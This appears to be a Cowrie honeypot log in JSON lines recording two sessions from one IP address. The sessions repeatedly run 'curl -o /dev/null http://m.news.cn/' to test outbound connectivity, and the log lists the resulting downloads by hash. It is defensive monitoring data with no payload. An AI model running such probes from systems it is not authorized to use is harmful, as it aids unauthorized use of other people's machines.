{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.518689Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.524397Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.551023Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.553578Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.554477Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.556794Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.557587Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.597975Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.598998Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.600763Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.601553Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.634401Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.635380Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.639675Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.640807Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.641602Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.658849Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.674598Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.675772Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.680522Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.681347Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.685104Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.711331Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.713995Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.715077Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.721272Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.722039Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.728806Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.735799Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.757782Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.758767Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.762697Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.763582Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.794646Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.798937Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.799795Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.806937Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.807905Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.834338Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.836009Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.836815Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.847328Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.848296Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.866324Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.874128Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.875208Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.886909Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.887972Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.894239Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.900720Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.906966Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.908870Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.912070Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.913056Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.931219Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.936381Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.937331Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.942520Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.954936Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.955848Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.976243Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.979120Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.992131Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.992998Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.010175Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.017693Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.019035Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.030542Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.031788Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.053098Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.057079Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.059040Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.060409Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.067451Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.068035Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.091900Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.098942Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.099854Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.104296Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.105370Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.120259Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.125648Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.127666Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.130943Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.136252Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.146077Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.147389Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
